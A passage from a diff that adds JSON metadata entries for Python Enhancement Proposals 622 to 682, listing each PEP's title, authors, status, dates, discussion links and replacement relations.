"Superseded", + "type": "Standards Track", + "topic": "", + "created": "23-Jun-2020", + "python_version": "3.10", + "post_history": "23-Jun-2020, 08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "634", + "url": "https://peps.python.org/pep-0622/" + }, + "623": { + "number": 623, + "title": "Remove wstr from Unicode", + "authors": "Inada Naoki", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/BO2TQHSXWL2RJMINWQQRBF5LANDDJNHH/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2020", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VQKDIZLZ6HF2MLTNCUFURK2IFTXVQEYA/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0623/" + }, + "624": { + "number": 624, + "title": "Remove Py_UNICODE encoder APIs", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jul-2020", + "python_version": "3.11", + "post_history": "08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0624/" + }, + "625": { + "number": 625, + "title": "Filename of a Source Distribution", + "authors": "Tzu-ping Chung, Paul Moore", + "discussions_to": "https://discuss.python.org/t/draft-pep-file-name-of-a-source-distribution/4686", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2020", + "python_version": null, + "post_history": "08-Jul-2020", + "resolution": "https://discuss.python.org/t/pep-625-file-name-of-a-source-distribution/4686/159", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0625/" + }, + "626": { + "number": 626, + "title": "Precise line numbers for debugging and other tools.", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2020", + "python_version": "3.10", + "post_history": "17-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0626/" + }, + "627": { + "number": 627, + "title": "Recording installed projects", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-627/4126", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Jul-2020", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-627/4126/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0627/" + }, + "628": { + "number": 628, + "title": "Add ``math.tau``", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2011", + "python_version": "3.6", + "post_history": "28-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0628/" + }, + "629": { + "number": 629, + "title": "Versioning PyPI's Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-629-versioning-pypis-simple-api/4720", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0629/" + }, + "630": { + "number": 630, + "title": "Isolating Extension Modules", + "authors": "Petr Viktorin", + "discussions_to": "capi-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0630/" + }, + "631": { + "number": 631, + "title": "Dependency specification in pyproject.toml based on PEP 508", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/5018", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Aug-2020", + "python_version": null, + "post_history": "20-Aug-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": "621", + "url": "https://peps.python.org/pep-0631/" + }, + "632": { + "number": 632, + "title": "Deprecate distutils module", + "authors": "Steve Dower", + "discussions_to": "https://discuss.python.org/t/pep-632-deprecate-distutils-module/5134", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2020", + "python_version": "3.10", + "post_history": "03-Sep-2020, 22-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/TXU6TVOMBLQU3SV57DMMOA5Y2E67AW7P/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0632/" + }, + "633": { + "number": 633, + "title": "Dependency specification in pyproject.toml using an exploded TOML table", + "authors": "Laurie Opperman, Arun Babu Neelicattu", + "discussions_to": "https://discuss.python.org/t/dependency-specification-in-pyproject-toml-using-an-exploded-toml-table/5123/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "02-Sep-2020", + "python_version": null, + "post_history": "02-Sep-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0633/" + }, + "634": { + "number": 634, + "title": "Structural Pattern Matching: Specification", + "authors": "Brandt Bucher, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": "622", + "superseded_by": null, + "url": "https://peps.python.org/pep-0634/" + }, + "635": { + "number": 635, + "title": "Structural Pattern Matching: Motivation and Rationale", + "authors": "Tobias Kohn, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0635/" + }, + "636": { + "number": 636, + "title": "Structural Pattern Matching: Tutorial", + "authors": "Daniel F Moisset", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0636/" + }, + "637": { + "number": 637, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2020", + "python_version": "3.10", + "post_history": "23-Sep-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6TAQ2BEVSJNV4JM2RJYSSYFJUT3INGZD/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0637/" + }, + "638": { + "number": 638, + "title": "Syntactic Macros", + "authors": "Mark Shannon", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/U4C4XHNRC4SHS3TPZWCTY4SN4QU3TT6V/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2020", + "python_version": null, + "post_history": "26-Sep-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0638/" + }, + "639": { + "number": 639, + "title": "Improving License Clarity with Better Package Metadata", + "authors": "Philippe Ombredanne, C.A.M. Gerlach, Karolina Surma", + "discussions_to": "https://discuss.python.org/t/53020", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Aug-2019", + "python_version": null, + "post_history": "`15-Aug-2019 `__, `17-Dec-2021 `__, `10-May-2024 `__,", + "resolution": "https://discuss.python.org/t/53020/106", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0639/" + }, + "640": { + "number": 640, + "title": "Unused variable syntax", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Oct-2020", + "python_version": "3.10", + "post_history": "19-Oct-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0640/" + }, + "641": { + "number": 641, + "title": "Using an underscore in the version portion of Python 3.10 compatibility tags", + "authors": "Brett Cannon, Steve Dower, Barry Warsaw", + "discussions_to": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Oct-2020", + "python_version": "3.10", + "post_history": "21-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0641/" + }, + "642": { + "number": 642, + "title": "Explicit Pattern Syntax for Structural Pattern Matching", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2020", + "python_version": "3.10", + "post_history": "31-Oct-2020, 08-Nov-2020, 03-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": "634", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0642/" + }, + "643": { + "number": 643, + "title": "Metadata for Package Source Distributions", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2020", + "python_version": null, + "post_history": "24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020", + "resolution": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577/53", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0643/" + }, + "644": { + "number": 644, + "title": "Require OpenSSL 1.1.1 or newer", + "authors": "Christian Heimes", + "discussions_to": "https://discuss.python.org/t/pep-644-require-openssl-1-1-or-newer/5584", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2020", + "python_version": "3.10", + "post_history": "27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/INLCO2EZVQW7R7J2OL6HWVLVU3TQRAZV/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0644/" + }, + "645": { + "number": 645, + "title": "Allow writing optional types as ``x?``", + "authors": "Maggie Moss", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/E75SPV6DDHLEEFSA5MBN5HUOQWDMUQJ2/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0645/" + }, + "646": { + "number": 646, + "title": "Variadic Generics", + "authors": "Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "16-Sep-2020", + "python_version": "3.11", + "post_history": "07-Oct-2020, 23-Dec-2020, 29-Dec-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/OR5RKV7GAVSGLVH3JAGQ6OXFAXIP5XDX/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0646/" + }, + "647": { + "number": 647, + "title": "User-Defined Type Guards", + "authors": "Eric Traut", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Oct-2020", + "python_version": "3.10", + "post_history": "28-Dec-2020, 09-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2ME6F6YUVKHOQYKSHTVQQU5WD4CVAZU4/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0647/" + }, + "648": { + "number": 648, + "title": "Extensible customizations of the interpreter at startup", + "authors": "Mario Corchero", + "discussions_to": "https://discuss.python.org/t/pep-648-extensible-customizations-of-the-interpreter-at-startup/6403", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Dec-2020", + "python_version": "3.11", + "post_history": "16-Dec-2020, 18-Dec-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0648/" + }, + "649": { + "number": 649, + "title": "Deferred Evaluation Of Annotations Using Descriptors", + "authors": "Larry Hastings", + "discussions_to": "https://discuss.python.org/t/pep-649-deferred-evaluation-of-annotations-tentatively-accepted/21331/", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "11-Jan-2021", + "python_version": "3.14", + "post_history": "`11-Jan-2021 `__, `12-Apr-2021 `__, `18-Apr-2021 `__, `09-Aug-2021 `__, `20-Oct-2021 `__, `20-Oct-2021 `__, `17-Nov-2021 `__, `15-Mar-2022 `__, `23-Nov-2022 `__, `07-Feb-2023 `__, `11-Apr-2023 `__,", + "resolution": "`08-May-2023 `__", + "requires": null, + "replaces": "563", + "superseded_by": null, + "url": "https://peps.python.org/pep-0649/" + }, + "650": { + "number": 650, + "title": "Specifying Installer Requirements for Python Projects", + "authors": "Vikram Jayanthi, Dustin Ingram, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/pep-650-specifying-installer-requirements-for-python-projects/6657", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "14-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0650/" + }, + "651": { + "number": 651, + "title": "Robust Stack Overflow Handling", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2021", + "python_version": null, + "post_history": "19-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0651/" + }, + "652": { + "number": 652, + "title": "Maintaining the Stable ABI", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pre-pep-maintaining-the-stable-abi/6986/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/IN4XMFLQJ6D6V67EXU27GV3QWSEHHNNH/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0652/" + }, + "653": { + "number": 653, + "title": "Precise Semantics for Pattern Matching", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": null, + "post_history": "18-Feb-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0653/" + }, + "654": { + "number": 654, + "title": "Exception Groups and except*", + "authors": "Irit Katriel, Yury Selivanov, Guido van Rossum", + "discussions_to": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2021", + "python_version": "3.11", + "post_history": "`22-Feb-2021 `__, `20-Mar-2021 `__, `03-Oct-2021 `__,", + "resolution": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813/1", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0654/" + }, + "655": { + "number": 655, + "title": "Marking individual TypedDict items as required or potentially-missing", + "authors": "David Foster", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/53XVOD5ZUKJ263MWA6AUPEA6J7LBBLNV/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Jan-2021", + "python_version": "3.11", + "post_history": "31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/AJEDNVC3FXM5QXNNW5CR4UCT4KI5XVUE/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0655/" + }, + "656": { + "number": 656, + "title": "Platform Tag for Linux Distributions Using Musl", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/7165", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Mar-2021", + "python_version": null, + "post_history": "17-Mar-2021, 18-Apr-2021", + "resolution": "https://discuss.python.org/t/7165/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0656/" + }, + "657": { + "number": 657, + "title": "Include Fine Grained Error Locations in Tracebacks", + "authors": "Pablo Galindo, Batuhan Taskaya, Ammar Askar", + "discussions_to": "https://discuss.python.org/t/pep-657-include-fine-grained-error-locations-in-tracebacks/8629", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-May-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0657/" + }, + "658": { + "number": 658, + "title": "Serve Distribution Metadata in the Simple Repository API", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/8651", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2021", + "python_version": null, + "post_history": "10-May-2021", + "resolution": "https://discuss.python.org/t/8651/48", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0658/" + }, + "659": { + "number": 659, + "title": "Specializing Adaptive Interpreter", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "13-Apr-2021", + "python_version": null, + "post_history": "11-May-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0659/" + }, + "660": { + "number": 660, + "title": "Editable installs for pyproject.toml based builds (wheel based)", + "authors": "Daniel Holth, St\u00e9phane Bidoul", + "discussions_to": "https://discuss.python.org/t/draft-pep-editable-installs-for-pep-517-style-build-backends/8510", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Mar-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0660/" + }, + "661": { + "number": 661, + "title": "Sentinel Values", + "authors": "Tal Einat", + "discussions_to": "https://discuss.python.org/t/pep-661-sentinel-values/9126", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2021", + "python_version": null, + "post_history": "`20-May-2021 `__, `06-Jun-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0661/" + }, + "662": { + "number": 662, + "title": "Editable installs via virtual wheels", + "authors": "Bern\u00e1t G\u00e1bor", + "discussions_to": "https://discuss.python.org/t/discuss-tbd-editable-installs-by-gaborbernat/9071", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "28-May-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0662/" + }, + "663": { + "number": 663, + "title": "Standardizing Enum str(), repr(), and format() behaviors", + "authors": "Ethan Furman", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "30-Jun-2021", + "python_version": "3.11", + "post_history": "20-Jul-2021, 02-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/RN3WCRZSTQR55DOHJTZ2KIO6CZPJPCU7/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0663/" + }, + "664": { + "number": 664, + "title": "Python 3.11 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0664/" + }, + "665": { + "number": 665, + "title": "A file format to list Python dependencies for reproducibility of an application", + "authors": "Brett Cannon, Pradyun Gedam, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/9911", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Jul-2021", + "python_version": null, + "post_history": "29-Jul-2021, 03-Nov-2021, 25-Nov-2021", + "resolution": "https://discuss.python.org/t/pep-665-take-2-a-file-format-to-list-python-dependencies-for-reproducibility-of-an-application/11736/140", + "requires": null, + "replaces": null, + "superseded_by": "751", + "url": "https://peps.python.org/pep-0665/" + }, + "666": { + "number": 666, + "title": "Reject Foolish Indentation", + "authors": "Laura Creighton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "03-Dec-2001", + "python_version": "2.2", + "post_history": "05-Dec-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0666/" + }, + "667": { + "number": 667, + "title": "Consistent views of namespaces", + "authors": "Mark Shannon, Tian Gao", + "discussions_to": "https://discuss.python.org/t/46631", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2021", + "python_version": "3.13", + "post_history": "20-Aug-2021, 22-Feb-2024", + "resolution": "`25-Apr-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0667/" + }, + "668": { + "number": 668, + "title": "Marking Python base environments as \u201cexternally managed\u201d", + "authors": "Geoffrey Thomas, Matthias Klose, Filipe La\u00edns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/10302", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "18-May-2021", + "python_version": null, + "post_history": "28-May-2021", + "resolution": "https://discuss.python.org/t/10302/44", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0668/" + }, + "669": { + "number": 669, + "title": "Low Impact Monitoring for CPython", + "authors": "Mark Shannon", + "discussions_to": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2021", + "python_version": "3.12", + "post_history": "`07-Dec-2021 `__, `10-Jan-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0669/" + }, + "670": { + "number": 670, + "title": "Convert macros to functions in the Python C API", + "authors": "Erlend Egeberg Aasland, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Oct-2021", + "python_version": "3.11", + "post_history": "`20-Oct-2021 `__, `08-Feb-2022 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/QQFCJ7LR36RUZSC3WI6WZZMQVQ3ZI4MS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0670/" + }, + "671": { + "number": 671, + "title": "Syntax for late-bound function argument defaults", + "authors": "Chris Angelico", + "discussions_to": "https://mail.python.org/archives/list/python-ideas@python.org/thread/UVOQEK7IRFSCBOH734T5GFJOEJXFCR6A/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Oct-2021", + "python_version": "3.12", + "post_history": "`24-Oct-2021 `__, `01-Dec-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0671/" + }, + "672": { + "number": 672, + "title": "Unicode-related Security Considerations for Python", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "01-Nov-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0672/" + }, + "673": { + "number": 673, + "title": "Self Type", + "authors": "Pradeep Kumar Srinivasan, James Hilton-Balfe", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "10-Nov-2021", + "python_version": "3.11", + "post_history": "17-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/J7BWL5KWOPQQK5KFWKENVLXW6UGSPTGI/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0673/" + }, + "674": { + "number": 674, + "title": "Disallow using macros as l-values", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2021", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0674/" + }, + "675": { + "number": 675, + "title": "Arbitrary Literal String Type", + "authors": "Pradeep Kumar Srinivasan, Graham Bleaney", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/VB74EHNM4RODDFM64NEEEBJQVAUAWIAW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Nov-2021", + "python_version": "3.11", + "post_history": "07-Feb-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/XEOOSSPNYPGZ5NXOJFPLXG2BTN7EVRT5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0675/" + }, + "676": { + "number": 676, + "title": "PEP Infrastructure Process", + "authors": "Adam Turner", + "discussions_to": "https://discuss.python.org/t/10774", + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "23-Sep-2021, 30-Nov-2021", + "resolution": "https://discuss.python.org/t/10774/99", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0676/" + }, + "677": { + "number": 677, + "title": "Callable Type Syntax", + "authors": "Steven Troxler, Pradeep Kumar Srinivasan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "typing", + "created": "13-Dec-2021", + "python_version": "3.11", + "post_history": "16-Dec-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NHCLHCU2XCWTBGF732WESMN42YYVKOXB/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0677/" + }, + "678": { + "number": 678, + "title": "Enriching Exceptions with Notes", + "authors": "Zac Hatfield-Dodds", + "discussions_to": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2021", + "python_version": "3.11", + "post_history": "`27-Jan-2022 `__", + "resolution": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374/100", + "requires": "654", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0678/" + }, + "679": { + "number": 679, + "title": "Allow parentheses in assert statements", + "authors": "Pablo Galindo Salgado", + "discussions_to": "https://discuss.python.org/t/pep-679-allow-parentheses-in-assert-statements/13003", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0679/" + }, + "680": { + "number": 680, + "title": "tomllib: Support for Parsing TOML in the Standard Library", + "authors": "Taneli Hukkinen, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/13040", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2022", + "python_version": "3.11", + "post_history": "`09-Dec-2021 `__, `27-Jan-2022 `__,", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/3AHGWYY562HHO55L4Z2OVYUFZP5W73IS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0680/" + }, + "681": { + "number": 681, + "title": "Data Class Transforms", + "authors": "Erik De Bonte, Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/EAALIHA3XEDFDNG2NRXTI3ERFPAD65Z4/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "02-Dec-2021", + "python_version": "3.11", + "post_history": "`24-Apr-2021 `__, `13-Dec-2021 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/R4A2IYLGFHKFDYJPSDA5NFJ6N7KRPJ6D/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0681/" + }, + "682": { + "number": 682, + "title": "Format Specifier for Signed Zero", + "authors": "John Belmonte", + "discussions_to": "https://discuss.python.org/t/pep-682-format-specifier-for-signed-zero/13596", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2022", + "python_version": "3.11", + "post_history": "08-Feb-2022", + "resolution": "https://discuss.python.org/t/accepting-pep-682-format-specifier-for-signed-zero/14088", + "requires": null, + 